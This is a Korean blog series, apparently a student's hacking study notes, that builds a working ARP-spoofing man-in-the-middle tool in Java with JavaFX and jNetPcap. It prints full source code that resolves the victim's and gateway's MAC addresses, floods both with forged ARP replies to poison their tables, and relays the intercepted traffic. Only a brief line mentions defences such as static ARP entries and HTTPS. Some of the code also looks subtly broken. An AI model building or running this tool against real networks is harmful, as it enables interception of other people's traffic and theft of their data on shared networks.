감염된 피해자 패킷 재전송

 

휴대폰 핫스팟을 키고 두대의 컴퓨터를 연결 후

 

target ip에다가는 핫스팟 ip를

 

sender ip에다가는 피해자 ip를 넣어주면

 

성공적으로 실행이 된다

 

ARP Spoofing의 대응 방법으로는

 

ARP 테이블이 변조되지 않도록 정적으로 설정하고

 

HTTPS등 패킷 암호화를 사용하는 서비스를 이용

 

controller.java

package controller;

import java.net.InetAddress;
import java.net.URL;
import java.nio.ByteBuffer;
import java.util.ArrayList;
import java.util.ResourceBundle;

import org.jnetpcap.Pcap;
import org.jnetpcap.PcapHeader;
import org.jnetpcap.PcapIf;
import org.jnetpcap.nio.JBuffer;
import org.jnetpcap.nio.JMemory;
import org.jnetpcap.packet.JRegistry;
import org.jnetpcap.packet.PcapPacket;
import org.jnetpcap.protocol.lan.Ethernet;
import org.jnetpcap.protocol.network.Ip4;

import javafx.application.Platform;
import javafx.collections.FXCollections;
import javafx.collections.ObservableList;
import javafx.fxml.FXML;
import javafx.fxml.Initializable;
import javafx.scene.control.Button;
import javafx.scene.control.ListView;
import javafx.scene.control.TextArea;
import javafx.scene.control.TextField;
import model.ARP;
import model.Util;

public class Controller implements Initializable {
	
	@FXML
	private ListView<String> networkListView;
	
	@FXML
	private TextArea textArea;
	
	@FXML
	private Button pickButton;
	
	@FXML
	private TextField myIP;
	
	@FXML
	private TextField senderIP;
	
	@FXML
	private TextField targetIP;
	
	@FXML
	private Button getMACButton;
	
	ObservableList<String> networkList = FXCollections.observableArrayList();
	
	private ArrayList<PcapIf> allDevs = null;
	
	@SuppressWarnings("deprecation")
	@Override
	public void initialize(URL location, ResourceBundle resources) {
		allDevs = new ArrayList<PcapIf>();
		StringBuilder errbuf = new StringBuilder();
		int r = Pcap.findAllDevs(allDevs, errbuf);
		if (r == Pcap.NOT_OK || allDevs.isEmpty()) {
			textArea.appendText("네트워크 장치를 찾을 수 없습니다.\n" + errbuf.toString() + "\n");
			return;
		}
		textArea.appendText("네트워크 장치를 찾았습니다.\n원하시는 장치를 선택해주세요.\n");
		for (PcapIf device : allDevs) {
			networkList.add(device.getName() + " " +
					((device.getDescription() != null) ? device.getDescription() : "설명 없음"));
		}
		networkListView.setItems(networkList);
	}
	
	public void networkPickAction() {
		if(networkListView.getSelectionModel().getSelectedIndex() < 0) {
			return;
		}
		Main.device = allDevs.get(networkListView.getSelectionModel().getSelectedIndex());
		networkListView.setDisable(true);
		pickButton.setDisable(true);
		
		int snaplen = 64 * 1024;
		int flags = Pcap.MODE_PROMISCUOUS;
		int timeout = 1;
		
		StringBuilder errbuf = new StringBuilder();
		Main.pcap = Pcap.openLive(Main.device.getName(), snaplen, flags, timeout, errbuf);
		
		if (Main.pcap == null) {
			textArea.appendText("네트워크 장치를 열 수 없습니다.\n" + errbuf.toString() + "\n");
			return;
		}
		textArea.appendText("장치선택 : " + Main.device.getName() + "\n");
		textArea.appendText("네트워크 장치를 활성화했습니다.\n");
	}
	
	public void getMACAction() {
		if(!pickButton.isDisable()) {
			textArea.appendText("네트워크 장치를 먼저 선택해주세요.\n");
			return;
		}
		
		ARP arp = new ARP();
		Ethernet eth = new Ethernet();
		PcapHeader header = new PcapHeader(JMemory.POINTER);
		JBuffer buf = new JBuffer(JMemory.POINTER);
		ByteBuffer buffer = null;
		
		int id = JRegistry.mapDLTToId(Main.pcap.datalink());
		
		try {
			Main.myMAC = Main.device.getHardwareAddress();
			Main.myIP = InetAddress.getByName(myIP.getText()).getAddress();
			Main.senderIP = InetAddress.getByName(senderIP.getText()).getAddress();
			Main.targetIP = InetAddress.getByName(targetIP.getText()).getAddress();
		}	catch (Exception e) {
				textArea.appendText("IP 주소가 잘못되었습니다.\n");
				return;
		}
		
		myIP.setDisable(true);
		senderIP.setDisable(true);
		targetIP.setDisable(true);
		getMACButton.setDisable(true);
		
		arp = new ARP();
		arp.makeARPRequest(Main.myMAC, Main.myIP, Main.targetIP);
		buffer = ByteBuffer.wrap(arp.getPacket());
		if (Main.pcap.sendPacket(buffer) != Pcap.OK) {
			System.out.println(Main.pcap.getErr());
		}
		textArea.appendText("타겟에게 ARP Request를 보냈습니다\n" +
				Util.bytesToString(arp.getPacket()) + "\n");
		
		long targetStartTime = System.currentTimeMillis();
		Main.targetMAC = new byte[6];
		while (Main.pcap.nextEx(header, buf) != Pcap.NEXT_EX_NOT_OK) {
			if (System.currentTimeMillis() - targetStartTime >= 500) {
				textArea.appendText("타겟이 응답하지 않습니다.\n");
				return;
			}
			PcapPacket packet = new PcapPacket(header, buf);
			packet.scan(id);
			byte[] sourceIP = new byte[4];
			System.arraycopy(packet.getByteArray(0, packet.size()), 28, sourceIP, 0, 4);
			if (packet.getByte(12) == 0x08 && packet.getByte(13) == 0x06
					&& packet.getByte(20) == 0x00 && packet.getByte(21) == 0x02
					&& Util.bytesToString(sourceIP).equals(Util.bytesToString(Main.targetIP))
					&& packet.hasHeader(eth)) {
				Main.targetMAC = eth.source();
				break;
			}	else {
				continue;
			}
		}
		
		textArea.appendText("타겟 맥 주소: " +
				Util.bytesToString(Main.targetMAC) + "\n");
	
	
	arp = new ARP();
	arp.makeARPRequest(Main.myMAC, Main.myIP, Main.senderIP);
	buffer = ByteBuffer.wrap(arp.getPacket());
	if (Main.pcap.sendPacket(buffer) != Pcap.OK) {
		System.out.println(Main.pcap.getErr());
	}
	textArea.appendText("타겟에게 ARP Request를 보냈습니다\n" +
			Util.bytesToString(arp.getPacket()) + "\n");
	
	long senderStartTime = System.currentTimeMillis();
	Main.senderMAC = new byte[6];
	while (Main.pcap.nextEx(header, buf) != Pcap.NEXT_EX_NOT_OK) {
		if (System.currentTimeMillis() - senderStartTime >= 500) {
			textArea.appendText("타겟이 응답하지 않습니다.\n");
			return;
		}
		PcapPacket packet = new PcapPacket(header, buf);
		packet.scan(id);
		byte[] sourceIP = new byte[4];
		System.arraycopy(packet.getByteArray(0, packet.size()), 28, senderIP, 0, 4);
		if (packet.getByte(12) == 0x08 && packet.getByte(13) == 0x06
				&& packet.getByte(20) == 0x00 && packet.getByte(21) == 0x02
				&& Util.bytesToString(sourceIP).equals(Util.bytesToString(Main.senderIP))
				&& packet.hasHeader(eth)) {
			Main.senderMAC = eth.source();
			break;
		}	else {
			continue;
		}
	}
	
	textArea.appendText("센더 맥 주소: " +
			Util.bytesToString(Main.senderMAC) + "\n");
	
	new SenderARPSpoofing().start();
	new TargetARPSpoofing().start();
	new ARPRelay().start();
	}
	
	class SenderARPSpoofing extends Thread {
		@Override
		public void run() {
			ARP arp = new ARP();
			arp.makeARPReply(Main.senderMAC, Main.myMAC, Main.myMAC, 
					Main.targetIP, Main.senderMAC, Main.senderIP);
			Platform.runLater(() -> {
				textArea.appendText("센더에게 감염된 ARP Reply 패킷을 계속해서 전송합니다.\n");
			});
			while(true) {
				ByteBuffer buffer = ByteBuffer.wrap(arp.getPacket());
				Main.pcap.sendPacket(buffer);
				try {
					Thread.sleep(200);
				} catch (Exception e) {
					e.printStackTrace();
				}
			}
		}
	}
	
	class TargetARPSpoofing extends Thread {
		@Override
		public void run() {
			ARP arp = new ARP();
			arp.makeARPReply(Main.targetMAC, Main.myMAC, Main.myMAC, 
					Main.senderIP, Main.targetMAC, Main.targetIP);
			Platform.runLater(() -> {
				textArea.appendText("타겟에게 감염된 ARP Reply 패킷을 계속해서 전송합니다.\n");
			});
			while(true) {
				ByteBuffer buffer = ByteBuffer.wrap(arp.getPacket());
				Main.pcap.sendPacket(buffer);
				try {
					Thread.sleep(200);
				} catch (Exception e) {
					e.printStackTrace();
				}
			}
		}
	}
	
	class ARPRelay extends Thread {
		@Override
		public void run() {
			Ip4 ip = new Ip4();
			PcapHeader header = new PcapHeader(JMemory.POINTER);
			JBuffer buf = new JBuffer(JMemory.POINTER);
			Platform.runLater(() -> {
					textArea.appendText("ARP Relay를 진행합니다.\n");
		});			
			while (Main.pcap.nextEx(header, buf) != Pcap.NEXT_EX_NOT_OK) {
				PcapPacket packet = new PcapPacket(header, buf);
				int id = JRegistry.mapDLTToId(Main.pcap.datalink());
				packet.scan(id);
				
				byte[] data = packet.getByteArray(0, packet.size());
				byte[] tempDestinationMAC = new byte[6];
				byte[] tempSourceMAC = new byte[6];
				
				System.arraycopy(data, 0, tempDestinationMAC, 0, 6);
				System.arraycopy(data, 6, tempSourceMAC, 0, 6);
				
				if(Util.bytesToString(tempDestinationMAC).equals(Util.bytesToString(Main.myMAC)) && 
						Util.bytesToString(tempSourceMAC).equals(Util.bytesToString(Main.myMAC))) {
					if(packet.hasHeader(ip)) {
						if (Util.bytesToString(ip.source()).equals(Util.bytesToString(Main.myIP))) {
							System.arraycopy(Main.targetMAC, 0, data, 0, 6);
							ByteBuffer buffer = ByteBuffer.wrap(data);
							Main.pcap.sendPacket(buffer);
						}
					}
				}
				
				else if(Util.bytesToString(tempDestinationMAC).equals(Util.bytesToString(Main.myMAC)) &&
						Util.bytesToString(tempSourceMAC).equals(Util.bytesToString(Main.senderMAC))) {
					if(packet.hasHeader(ip)) {
						System.arraycopy(Main.targetMAC, 0, data, 0, 6);
						System.arraycopy(Main.myMAC, 0, data, 6, 6);
						ByteBuffer buffer = ByteBuffer.wrap(data);
						Main.pcap.sendPacket(buffer);
					}
				}
				
				else if(Util.bytesToString(tempDestinationMAC).equals(Util.bytesToString(Main.myMAC)) &&
						Util.bytesToString(tempSourceMAC).equals(Util.bytesToString(Main.targetMAC))) {
					if(packet.hasHeader(ip)) {
						if (Util.bytesToString(ip.destination()).equals(Util.bytesToString(Main.senderIP))) {
							System.arraycopy(Main.senderMAC, 0, data, 0, 6);
							System.arraycopy(Main.myMAC, 0, data, 6, 6);
							ByteBuffer buffer = ByteBuffer.wrap(data);
							Main.pcap.sendPacket(buffer);
						}
					}
				}
				System.out.println(Util.bytesToString(buf.getByteArray(0, buf.size())));
			}
		}
	}
}

'Hacking > ARP 스푸핑' 카테고리의 다른 글

공부(16)  (0) 2021.09.13
공부(15)  (0) 2021.09.12
공부(14)  (0) 2021.09.12
공부(13)  (0) 2021.09.12
공부(12)  (0) 2021.09.11

ARP 테이블 감염시키기

 

피해자 컴퓨터한테 이렇게 말해주는 것

 

타겟아이피를 가지는 컴퓨터 즉 공유기 MAC주소는 내 MAC 주소라고

 

이걸 보내줌으로써 피해자컴퓨터에서는 공유기의 MAC주소가 내 MAC주소가 된다

 

이제 피해자는 나를 공유기로 착각하고 게이트웨이에게 보내줘야할 패킷을 나에게 전송하게 됨

 

 

Controller.java

package controller;

import java.net.InetAddress;
import java.net.URL;
import java.nio.ByteBuffer;
import java.util.ArrayList;
import java.util.ResourceBundle;

import org.jnetpcap.Pcap;
import org.jnetpcap.PcapHeader;
import org.jnetpcap.PcapIf;
import org.jnetpcap.nio.JBuffer;
import org.jnetpcap.nio.JMemory;
import org.jnetpcap.packet.JRegistry;
import org.jnetpcap.packet.PcapPacket;
import org.jnetpcap.protocol.lan.Ethernet;

import javafx.application.Platform;
import javafx.collections.FXCollections;
import javafx.collections.ObservableList;
import javafx.fxml.FXML;
import javafx.fxml.Initializable;
import javafx.scene.control.Button;
import javafx.scene.control.ListView;
import javafx.scene.control.TextArea;
import javafx.scene.control.TextField;
import model.ARP;
import model.Util;

public class Controller implements Initializable {
	
	@FXML
	private ListView<String> networkListView;
	
	@FXML
	private TextArea textArea;
	
	@FXML
	private Button pickButton;
	
	@FXML
	private TextField myIP;
	
	@FXML
	private TextField senderIP;
	
	@FXML
	private TextField targetIP;
	
	@FXML
	private Button getMACButton;
	
	ObservableList<String> networkList = FXCollections.observableArrayList();
	
	private ArrayList<PcapIf> allDevs = null;
	
	@SuppressWarnings("deprecation")
	@Override
	public void initialize(URL location, ResourceBundle resources) {
		allDevs = new ArrayList<PcapIf>();
		StringBuilder errbuf = new StringBuilder();
		int r = Pcap.findAllDevs(allDevs, errbuf);
		if (r == Pcap.NOT_OK || allDevs.isEmpty()) {
			textArea.appendText("네트워크 장치를 찾을 수 없습니다.\n" + errbuf.toString() + "\n");
			return;
		}
		textArea.appendText("네트워크 장치를 찾았습니다.\n원하시는 장치를 선택해주세요.\n");
		for (PcapIf device : allDevs) {
			networkList.add(device.getName() + " " +
					((device.getDescription() != null) ? device.getDescription() : "설명 없음"));
		}
		networkListView.setItems(networkList);
	}
	
	public void networkPickAction() {
		if(networkListView.getSelectionModel().getSelectedIndex() < 0) {
			return;
		}
		Main.device = allDevs.get(networkListView.getSelectionModel().getSelectedIndex());
		networkListView.setDisable(true);
		pickButton.setDisable(true);
		
		int snaplen = 64 * 1024;
		int flags = Pcap.MODE_PROMISCUOUS;
		int timeout = 1;
		
		StringBuilder errbuf = new StringBuilder();
		Main.pcap = Pcap.openLive(Main.device.getName(), snaplen, flags, timeout, errbuf);
		
		if (Main.pcap == null) {
			textArea.appendText("네트워크 장치를 열 수 없습니다.\n" + errbuf.toString() + "\n");
			return;
		}
		textArea.appendText("장치선택 : " + Main.device.getName() + "\n");
		textArea.appendText("네트워크 장치를 활성화했습니다.\n");
	}
	
	public void getMACAction() {
		if(!pickButton.isDisable()) {
			textArea.appendText("네트워크 장치를 먼저 선택해주세요.\n");
			return;
		}
		
		ARP arp = new ARP();
		Ethernet eth = new Ethernet();
		PcapHeader header = new PcapHeader(JMemory.POINTER);
		JBuffer buf = new JBuffer(JMemory.POINTER);
		ByteBuffer buffer = null;
		
		int id = JRegistry.mapDLTToId(Main.pcap.datalink());
		
		try {
			Main.myMAC = Main.device.getHardwareAddress();
			Main.myIP = InetAddress.getByName(myIP.getText()).getAddress();
			Main.senderIP = InetAddress.getByName(senderIP.getText()).getAddress();
			Main.targetIP = InetAddress.getByName(targetIP.getText()).getAddress();
		}	catch (Exception e) {
				textArea.appendText("IP 주소가 잘못되었습니다.\n");
				return;
		}
		
		myIP.setDisable(true);
		senderIP.setDisable(true);
		targetIP.setDisable(true);
		getMACButton.setDisable(true);
		
		arp = new ARP();
		arp.makeARPRequest(Main.myMAC, Main.myIP, Main.targetIP);
		buffer = ByteBuffer.wrap(arp.getPacket());
		if (Main.pcap.sendPacket(buffer) != Pcap.OK) {
			System.out.println(Main.pcap.getErr());
		}
		textArea.appendText("타겟에게 ARP Request를 보냈습니다\n" +
				Util.bytesToString(arp.getPacket()) + "\n");
		
		long targetStartTime = System.currentTimeMillis();
		Main.targetMAC = new byte[6];
		while (Main.pcap.nextEx(header, buf) != Pcap.NEXT_EX_NOT_OK) {
			if (System.currentTimeMillis() - targetStartTime >= 500) {
				textArea.appendText("타겟이 응답하지 않습니다.\n");
				return;
			}
			PcapPacket packet = new PcapPacket(header, buf);
			packet.scan(id);
			byte[] sourceIP = new byte[4];
			System.arraycopy(packet.getByteArray(0, packet.size()), 28, sourceIP, 0, 4);
			if (packet.getByte(12) == 0x08 && packet.getByte(13) == 0x06
					&& packet.getByte(20) == 0x00 && packet.getByte(21) == 0x02
					&& Util.bytesToString(sourceIP).equals(Util.bytesToString(Main.targetIP))
					&& packet.hasHeader(eth)) {
				Main.targetMAC = eth.source();
				break;
			}	else {
				continue;
			}
		}
		
		textArea.appendText("타겟 맥 주소: " +
				Util.bytesToString(Main.targetMAC) + "\n");
	
	
	arp = new ARP();
	arp.makeARPRequest(Main.myMAC, Main.myIP, Main.senderIP);
	buffer = ByteBuffer.wrap(arp.getPacket());
	if (Main.pcap.sendPacket(buffer) != Pcap.OK) {
		System.out.println(Main.pcap.getErr());
	}
	textArea.appendText("타겟에게 ARP Request를 보냈습니다\n" +
			Util.bytesToString(arp.getPacket()) + "\n");
	
	long senderStartTime = System.currentTimeMillis();
	Main.senderMAC = new byte[6];
	while (Main.pcap.nextEx(header, buf) != Pcap.NEXT_EX_NOT_OK) {
		if (System.currentTimeMillis() - senderStartTime >= 500) {
			textArea.appendText("타겟이 응답하지 않습니다.\n");
			return;
		}
		PcapPacket packet = new PcapPacket(header, buf);
		packet.scan(id);
		byte[] sourceIP = new byte[4];
		System.arraycopy(packet.getByteArray(0, packet.size()), 28, senderIP, 0, 4);
		if (packet.getByte(12) == 0x08 && packet.getByte(13) == 0x06
				&& packet.getByte(20) == 0x00 && packet.getByte(21) == 0x02
				&& Util.bytesToString(sourceIP).equals(Util.bytesToString(Main.senderIP))
				&& packet.hasHeader(eth)) {
			Main.senderMAC = eth.source();
			break;
		}	else {
			continue;
		}
	}
	
	textArea.appendText("센더 맥 주소: " +
			Util.bytesToString(Main.senderMAC) + "\n");
	
	new SenderARPSpoofing().start();
	new TargetARPSpoofing().start();
	}
	
	class SenderARPSpoofing extends Thread {
		@Override
		public void run() {
			ARP arp = new ARP();
			arp.makeARPReply(Main.senderMAC, Main.myMAC, Main.myMAC, 
					Main.targetIP, Main.senderMAC, Main.senderIP);
			Platform.runLater(() -> {
				textArea.appendText("센더에게 감염된 ARP Reply 패킷을 계속해서 전송합니다.\n");
			});
			while(true) {
				ByteBuffer buffer = ByteBuffer.wrap(arp.getPacket());
				Main.pcap.sendPacket(buffer);
				try {
					Thread.sleep(200);
				} catch (Exception e) {
					e.printStackTrace();
				}
			}
		}
	}
	
	class TargetARPSpoofing extends Thread {
		@Override
		public void run() {
			ARP arp = new ARP();
			arp.makeARPReply(Main.targetMAC, Main.myMAC, Main.myMAC, 
					Main.senderIP, Main.targetMAC, Main.targetIP);
			Platform.runLater(() -> {
				textArea.appendText("타겟에게 감염된 ARP Reply 패킷을 계속해서 전송합니다.\n");
			});
			while(true) {
				ByteBuffer buffer = ByteBuffer.wrap(arp.getPacket());
				Main.pcap.sendPacket(buffer);
				try {
					Thread.sleep(200);
				} catch (Exception e) {
					e.printStackTrace();
				}
			}
		}
	}
}

 

 

 

'Hacking > ARP 스푸핑' 카테고리의 다른 글

공부(17)  (0) 2021.09.13
공부(15)  (0) 2021.09.12
공부(14)  (0) 2021.09.12
공부(13)  (0) 2021.09.12
공부(12)  (0) 2021.09.11

피해자 MAC 주소 추출(2)

 

cmd로 arp -a 를 쳐서 나온 데이터중 자신의 IP를 확인 가능

 

controller.java

package controller;

import java.net.InetAddress;
import java.net.URL;
import java.nio.ByteBuffer;
import java.util.ArrayList;
import java.util.ResourceBundle;

import org.jnetpcap.Pcap;
import org.jnetpcap.PcapHeader;
import org.jnetpcap.PcapIf;
import org.jnetpcap.nio.JBuffer;
import org.jnetpcap.nio.JMemory;
import org.jnetpcap.packet.JRegistry;
import org.jnetpcap.packet.PcapPacket;
import org.jnetpcap.protocol.lan.Ethernet;

import javafx.collections.FXCollections;
import javafx.collections.ObservableList;
import javafx.fxml.FXML;
import javafx.fxml.Initializable;
import javafx.scene.control.Button;
import javafx.scene.control.ListView;
import javafx.scene.control.TextArea;
import javafx.scene.control.TextField;
import model.ARP;
import model.Util;

public class Controller implements Initializable {
	
	@FXML
	private ListView<String> networkListView;
	
	@FXML
	private TextArea textArea;
	
	@FXML
	private Button pickButton;
	
	@FXML
	private TextField myIP;
	
	@FXML
	private TextField senderIP;
	
	@FXML
	private TextField targetIP;
	
	@FXML
	private Button getMACButton;
	
	ObservableList<String> networkList = FXCollections.observableArrayList();
	
	private ArrayList<PcapIf> allDevs = null;
	
	@SuppressWarnings("deprecation")
	@Override
	public void initialize(URL location, ResourceBundle resources) {
		allDevs = new ArrayList<PcapIf>();
		StringBuilder errbuf = new StringBuilder();
		int r = Pcap.findAllDevs(allDevs, errbuf);
		if (r == Pcap.NOT_OK || allDevs.isEmpty()) {
			textArea.appendText("네트워크 장치를 찾을 수 없습니다.\n" + errbuf.toString() + "\n");
			return;
		}
		textArea.appendText("네트워크 장치를 찾았습니다.\n원하시는 장치를 선택해주세요.\n");
		for (PcapIf device : allDevs) {
			networkList.add(device.getName() + " " +
					((device.getDescription() != null) ? device.getDescription() : "설명 없음"));
		}
		networkListView.setItems(networkList);
	}
	
	public void networkPickAction() {
		if(networkListView.getSelectionModel().getSelectedIndex() < 0) {
			return;
		}
		Main.device = allDevs.get(networkListView.getSelectionModel().getSelectedIndex());
		networkListView.setDisable(true);
		pickButton.setDisable(true);
		
		int snaplen = 64 * 1024;
		int flags = Pcap.MODE_PROMISCUOUS;
		int timeout = 1;
		
		StringBuilder errbuf = new StringBuilder();
		Main.pcap = Pcap.openLive(Main.device.getName(), snaplen, flags, timeout, errbuf);
		
		if (Main.pcap == null) {
			textArea.appendText("네트워크 장치를 열 수 없습니다.\n" + errbuf.toString() + "\n");
			return;
		}
		textArea.appendText("장치선택 : " + Main.device.getName() + "\n");
		textArea.appendText("네트워크 장치를 활성화했습니다.\n");
	}
	
	public void getMACAction() {
		if(!pickButton.isDisable()) {
			textArea.appendText("네트워크 장치를 먼저 선택해주세요.\n");
			return;
		}
		
		ARP arp = new ARP();
		Ethernet eth = new Ethernet();
		PcapHeader header = new PcapHeader(JMemory.POINTER);
		JBuffer buf = new JBuffer(JMemory.POINTER);
		ByteBuffer buffer = null;
		
		int id = JRegistry.mapDLTToId(Main.pcap.datalink());
		
		try {
			Main.myMAC = Main.device.getHardwareAddress();
			Main.myIP = InetAddress.getByName(myIP.getText()).getAddress();
			Main.senderIP = InetAddress.getByName(senderIP.getText()).getAddress();
			Main.targetIP = InetAddress.getByName(targetIP.getText()).getAddress();
		}	catch (Exception e) {
				textArea.appendText("IP 주소가 잘못되었습니다.\n");
				return;
		}
		
		myIP.setDisable(true);
		senderIP.setDisable(true);
		targetIP.setDisable(true);
		getMACButton.setDisable(true);
		
		arp = new ARP();
		arp.makeARPRequest(Main.myMAC, Main.myIP, Main.targetIP);
		buffer = ByteBuffer.wrap(arp.getPacket());
		if (Main.pcap.sendPacket(buffer) != Pcap.OK) {
			System.out.println(Main.pcap.getErr());
		}
		textArea.appendText("타겟에게 ARP Request를 보냈습니다\n" +
				Util.bytesToString(arp.getPacket()) + "\n");
		
		Main.targetMAC = new byte[6];
		while (Main.pcap.nextEx(header, buf) != Pcap.NEXT_EX_NOT_OK) {
			PcapPacket packet = new PcapPacket(header, buf);
			packet.scan(id);
			byte[] sourceIP = new byte[4];
			System.arraycopy(packet.getByteArray(0, packet.size()), 28, sourceIP, 0, 4);
			if (packet.getByte(12) == 0x08 && packet.getByte(13) == 0x06
					&& packet.getByte(20) == 0x00 && packet.getByte(21) == 0x02
					&& Util.bytesToString(sourceIP).equals(Util.bytesToString(Main.targetIP))
					&& packet.hasHeader(eth)) {
				Main.targetMAC = eth.source();
				break;
			}	else {
				continue;
			}
		}
		
		textArea.appendText("타겟 맥 주소: " +
				Util.bytesToString(Main.targetMAC) + "\n");
	
	
	arp = new ARP();
	arp.makeARPRequest(Main.myMAC, Main.myIP, Main.senderIP);
	buffer = ByteBuffer.wrap(arp.getPacket());
	if (Main.pcap.sendPacket(buffer) != Pcap.OK) {
		System.out.println(Main.pcap.getErr());
	}
	textArea.appendText("tpsej에게 ARP Request를 보냈습니다\n" +
			Util.bytesToString(arp.getPacket()) + "\n");
	
	Main.senderMAC = new byte[6];
	while (Main.pcap.nextEx(header, buf) != Pcap.NEXT_EX_NOT_OK) {
		PcapPacket packet = new PcapPacket(header, buf);
		packet.scan(id);
		byte[] sourceIP = new byte[4];
		System.arraycopy(packet.getByteArray(0, packet.size()), 28, senderIP, 0, 4);
		if (packet.getByte(12) == 0x08 && packet.getByte(13) == 0x06
				&& packet.getByte(20) == 0x00 && packet.getByte(21) == 0x02
				&& Util.bytesToString(sourceIP).equals(Util.bytesToString(Main.senderIP))
				&& packet.hasHeader(eth)) {
			Main.senderMAC = eth.source();
			break;
		}	else {
			continue;
		}
	}
	
	textArea.appendText("센더 맥 주소: " +
			Util.bytesToString(Main.senderMAC) + "\n");
}
}

'Hacking > ARP 스푸핑' 카테고리의 다른 글

공부(17)  (0) 2021.09.13
공부(16)  (0) 2021.09.13
공부(14)  (0) 2021.09.12
공부(13)  (0) 2021.09.12
공부(12)  (0) 2021.09.11

피해자 MAC 주소 추출(1)

 

sender는 목표로 하고있는 피해자

 

target은 일반적으로 라우터를 의미

 

일반적으로 라우터를 거쳐서 패킷을 보낼 것임

 

Main.java

package controller;

import org.jnetpcap.Pcap;
import org.jnetpcap.PcapIf;

import javafx.application.Application;
import javafx.fxml.FXMLLoader;
import javafx.scene.Scene;
import javafx.scene.layout.AnchorPane;
import javafx.stage.Stage;

public class Main extends Application {
	
	public static Pcap pcap = null;
	public static PcapIf device = null;
	
	public static byte[] myIP = null;
	public static byte[] senderIP =null;
	public static byte[] targetIP =null;
	
	public static byte[] myMAC = null;
	public static byte[] senderMAC =null;
	public static byte[] targetMAC =null;
	
	private Stage primaryStage;
	private AnchorPane layout;
	
	@Override
	public void start(Stage primaryStage) {
		this.primaryStage = primaryStage;
		this.primaryStage.setTitle("JavaFX ARP SPoofing");
		setLayout();
	}
	
	public void setLayout() {
		try {
			FXMLLoader loader = new FXMLLoader();
			loader.setLocation(Main.class.getResource("../view/View.fxml"));
			layout = (AnchorPane) loader.load();
			Scene scene = new Scene(layout);
			primaryStage.setScene(scene);
			primaryStage.show();
		} catch (Exception e) {
			e.printStackTrace();
		}
	}
	
	public Stage getPrimaryStage() {
		return primaryStage;
	}
	
	public static void main(String[] args) {
		launch(args);
	}

}

 

Controller.java

package controller;

import java.net.InetAddress;
import java.net.URL;
import java.nio.ByteBuffer;
import java.util.ArrayList;
import java.util.ResourceBundle;

import org.jnetpcap.Pcap;
import org.jnetpcap.PcapHeader;
import org.jnetpcap.PcapIf;
import org.jnetpcap.nio.JBuffer;
import org.jnetpcap.nio.JMemory;
import org.jnetpcap.packet.JRegistry;
import org.jnetpcap.protocol.lan.Ethernet;

import javafx.collections.FXCollections;
import javafx.collections.ObservableList;
import javafx.fxml.FXML;
import javafx.fxml.Initializable;
import javafx.scene.control.Button;
import javafx.scene.control.ListView;
import javafx.scene.control.TextArea;
import javafx.scene.control.TextField;
import model.ARP;
import model.Util;

public class Controller implements Initializable {
	
	@FXML
	private ListView<String> networkListView;
	
	@FXML
	private TextArea textArea;
	
	@FXML
	private Button pickButton;
	
	@FXML
	private TextField myIP;
	
	@FXML
	private TextField senderIP;
	
	@FXML
	private TextField targetIP;
	
	@FXML
	private Button getMACButton;
	
	ObservableList<String> networkList = FXCollections.observableArrayList();
	
	private ArrayList<PcapIf> allDevs = null;
	
	@SuppressWarnings("deprecation")
	@Override
	public void initialize(URL location, ResourceBundle resources) {
		allDevs = new ArrayList<PcapIf>();
		StringBuilder errbuf = new StringBuilder();
		int r = Pcap.findAllDevs(allDevs, errbuf);
		if (r == Pcap.NOT_OK || allDevs.isEmpty()) {
			textArea.appendText("네트워크 장치를 찾을 수 없습니다.\n" + errbuf.toString() + "\n");
			return;
		}
		textArea.appendText("네트워크 장치를 찾았습니다.\n원하시는 장치를 선택해주세요.\n");
		for (PcapIf device : allDevs) {
			networkList.add(device.getName() + " " +
					((device.getDescription() != null) ? device.getDescription() : "설명 없음"));
		}
		networkListView.setItems(networkList);
	}
	
	public void networkPickAction() {
		if(networkListView.getSelectionModel().getSelectedIndex() < 0) {
			return;
		}
		Main.device = allDevs.get(networkListView.getSelectionModel().getSelectedIndex());
		networkListView.setDisable(true);
		pickButton.setDisable(true);
		
		int snaplen = 64 * 1024;
		int flags = Pcap.MODE_PROMISCUOUS;
		int timeout = 1;
		
		StringBuilder errbuf = new StringBuilder();
		Main.pcap = Pcap.openLive(Main.device.getName(), snaplen, flags, timeout, errbuf);
		
		if (Main.pcap == null) {
			textArea.appendText("네트워크 장치를 열 수 없습니다.\n" + errbuf.toString() + "\n");
			return;
		}
		textArea.appendText("장치선택 : " + Main.device.getName() + "\n");
		textArea.appendText("네트워크 장치를 활성화했습니다.\n");
	}
	
	public void getMACAction() {
		if(!pickButton.isDisable()) {
			textArea.appendText("네트워크 장치를 먼저 선택해주세요.\n");
			return;
		}
		
		ARP arp = new ARP();
		Ethernet eth = new Ethernet();
		PcapHeader header = new PcapHeader(JMemory.POINTER);
		JBuffer buf = new JBuffer(JMemory.POINTER);
		ByteBuffer buffer = null;
		
		int id = JRegistry.mapDLTToId(Main.pcap.datalink());
		
		try {
			Main.myMAC = Main.device.getHardwareAddress();
			Main.myIP = InetAddress.getByName(myIP.getText()).getAddress();
			Main.senderIP = InetAddress.getByName(senderIP.getText()).getAddress();
			Main.targetIP = InetAddress.getByName(targetIP.getText()).getAddress();
		}	catch (Exception e) {
				textArea.appendText("IP 주소가 잘못되었습니다.\n");
				return;
		}
		
		myIP.setDisable(true);
		senderIP.setDisable(true);
		targetIP.setDisable(true);
		getMACButton.setDisable(true);
		
		arp = new ARP();
		arp.makeARPRequest(Main.myMAC, Main.myIP, Main.targetIP);
		buffer = ByteBuffer.wrap(arp.getPacket());
		if (Main.pcap.sendPacket(buffer) != Pcap.OK) {
			System.out.println(Main.pcap.getErr());
		}
		textArea.appendText("타겟에게 ARP Request를 보냈습니다\n" +
				Util.bytesToString(arp.getPacket()) + "\n");
	}
}

 

Util.java

package model;

public class Util {

	public static String bytesToString(byte[] bytes) {
		StringBuilder sb = new  StringBuilder();
		int i= 0;
		for (byte b : bytes) {
			sb.append(String.format("%02x ", b & 0xff));
			if(++i % 16 ==0) sb.append("\n");
		}
		return sb.toString();
	}
}

 

View.fxml

<?xml version="1.0" encoding="UTF-8"?>

<?import javafx.scene.control.*?>
<?import javafx.scene.layout.*?>
<?import javafx.scene.text.*?>
<?import javafx.collections.*?>

<AnchorPane prefHeight="480" prefWidth="750" fx:controller="controller.Controller"
	xmlns:fx="http://javafx.com/fxml/1">
	<children>
		<ListView fx:id="networkListView" layoutX="15" layoutY="14" 
			prefHeight="86" prefWidth="462">
			<items>
				<FXCollections fx:factory="observableArrayList"/>
			</items>
		</ListView>
		<Button fx:id="pickButton" onAction="#networkPickAction" layoutX="395" layoutY="112" 
			prefHeight="29" prefWidth="82" text="PICK"></Button>
